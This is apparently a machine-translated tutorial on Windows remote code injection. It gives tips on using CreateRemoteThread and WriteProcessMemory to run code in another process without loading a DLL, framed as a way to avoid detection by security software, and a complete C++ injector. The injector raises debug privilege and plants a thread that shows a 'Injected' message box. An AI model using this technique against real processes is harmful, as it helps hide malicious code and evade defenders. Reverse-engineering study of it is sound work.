Remote code injection

TIPS
1.
When the writing process was hidden, I wrote dll Injection tool , This tool will write to the target process dll name , And then use it loadlirary load dll. How to make that program call loadlirary What about ？ It is used. CreateRemoteThread This function , Creating remote threads , Why should Microsoft provide such a function ？ In fact, it is not specifically provided by Microsoft to inject into us API, This API The actual function of is to create remote threads , The thread prototype created is DWORD WINAPI ThreadProc(LPVOID lparam), There is only one parameter , And the parameter is a pointer to any content , and loadlirary The prototype of the function is HMODULE WINAPI LoadLibrary( LPCTSTR lpFileName), It can be seen that the two of them are very close , All are 1 Parameters , That parameter is a pointer , So this function is developed to inject dll Of API, And it won't go wrong , According to the grammar , But the running thread function is replaced with LoadLibrary function , Then run the thread = load dll, And then dllmain It runs all kinds of code .
2.
But in fact, this way is not hidden enough , Because you loaded... In the program DLL, There is a great chance that such a big movement will be detected , And since you have dll The entity will respond quickly by the cloud , let me put it another way , This injection dll The way is easy to intercept
3.
We can actually use it CreateRemoteThread The original function of the function , That is, run directly ThreadProc, And this ThreadProc The code of the function passes WriteProcessMemory To write , The parameters of the function lparam The content pointed to can be written in the same way , This call CreateRemoteThread Will directly run the ThreadProc function
4.
stay ThreadProc Call in function API At that time, we were not sure whether the program we injected had loaded this API Of DLL, So we usually need to call something API To join him LoadLibrary, To load this api Of dll
5.
Of the core principles of reverse engineering ThreadProc Yes LoadLibrary Plus call GetprocAddress Then dynamically call MessageBoxA This step , It feels complicated and unnecessary , Send it directly to him MessageBoxA The address of , After testing, there is no problem
6.
Call important API There is a parameter you need to know ThreadProc The size of the entire function , Here is a clever use of (DWORD)ThreadProc-(DWORD)Code_Inject To calculate the , You can imagine , These two functions are next to each other , And when writing ThreadProc stay Code_Inject Back , Is it possible to get ThreadProc The size of ？ If you still don't know, you can debug it

CodeInject.h

#include "windows.h"
#include <iostream>
using namespace std;


//*******************************Params Definition *****************************************
typedef struct _THREAD_PARAM{
 FARPROC pFunc[2];
 char szbuf[2][128];
}THREAD_PARAM,*PTHREAD_PARAM;


//*******************************Windows API Definition *****************************************
typedef HMODULE (WINAPI *PFLOADLIBRARY)(LPCSTR lpLibFileName);   //LoadLibrary()

typedef int (WINAPI *PFMESSAGEBOXA)(HWND hwnd,LPCSTR lptext,LPCSTR lpcaption,UINT utype);   //MessageBoxA()

DWORD WINAPI ThreadProc(LPVOID lparam);       //injected-thread

BOOL EnableDebugPrivilege();       // Weighting function 

void Code_Inject();                // Code injection function 

CodeInject.cpp

#include "CodeInject.h"


DWORD Inject_Pid=0;
THREAD_PARAM param={
   0,};

int main(){
    cout<<"plz input pid you want to inject"<<endl;
    cin>>Inject_Pid;
    LoadLibraryA("user32.dll");
    //**************************** Set up Params Parameters *********************************
    HMODULE hmod1=GetModuleHandleA("kernel32.dll");
    HMODULE hmod2=GetModuleHandleA("user32.dll");
    param.pFunc[0]=GetProcAddress(hmod1,"LoadLibraryA");  // Make sure user32.dll Loaded 
    param.pFunc[1]=GetProcAddress(hmod2,"MessageBoxA");   // call MessageBoxA
    strcpy_s(param.szbuf[0],"user32.dll");                //LoadLibraryA Parameters of 
    strcpy_s(param.szbuf[1],"Injected");                  //MessageBoxA Parameters of 
    //**************************** Set up Params complete *********************************

    Code_Inject();

    return 0;
}


void Code_Inject(){
    if(!EnableDebugPrivilege()){                                               // Raise the right 
        cout<<"EnableDebugPrivilege Failed";
        system("pause");
        return;
    }
    HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,Inject_Pid);           // Get process handle 
    LPVOID param_address=VirtualAllocEx(hprocess,NULL,sizeof(THREAD_PARAM),MEM_COMMIT,PAGE_READWRITE);     // Apply to deposit param Space 
    LPVOID ThreadProc_address=VirtualAllocEx(hprocess,NULL,(DWORD)ThreadProc-(DWORD)Code_Inject,MEM_COMMIT,PAGE_READWRITE);// Apply to deposit ThreadProc Space ,ThreadProc Size through Code_Inject-ThreadProc obtain （ Note that this cannot be a negative number ？）
    WriteProcessMemory(hprocess,param_address,(LPVOID)&param,sizeof(THREAD_PARAM),NULL);     // write in param
    WriteProcessMemory(hprocess,ThreadProc_address,(LPVOID)ThreadProc,(DWORD)ThreadProc-(DWORD)Code_Inject,NULL);     // write in ThreadProc
    HANDLE hthread=CreateRemoteThread(hprocess,NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc_address,param_address,0,NULL);   // establish ThreadProc Threads 
    WaitForSingleObject(hthread,INFINITE);
    CloseHandle(hthread);
    CloseHandle(hprocess);
}
DWORD WINAPI ThreadProc(LPVOID lparam){
    PTHREAD_PARAM pParam=(PTHREAD_PARAM)lparam;
    ((PFLOADLIBRARY)pParam->pFunc[0])(pParam->szbuf[0]);  //LoadLibraryA("user32.dll")
    ((PFMESSAGEBOXA)pParam->pFunc[1])(NULL,pParam->szbuf[1],pParam->szbuf[1],NULL);  //MessageBoxA(NULL,"Injected","Injected",NULL);
    return 0;
}

BOOL EnableDebugPrivilege(){
    HANDLE hToken;
    BOOL fOk=FALSE;
    if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ //Get Token
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount=1;
        if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid))//Get Luid
            cout<<"Can't lookup privilege value"<<endl;
        tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;// That's the key , Modify its attribute to SE_PRIVILEGE_ENABLED
        if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL))//Adjust Token
            cout<<"Can't adjust privilege value"<<endl;
        fOk=(GetLastError()==ERROR_SUCCESS);
        CloseHandle(hToken);
        hToken=NULL;
    }
    return fOk;
}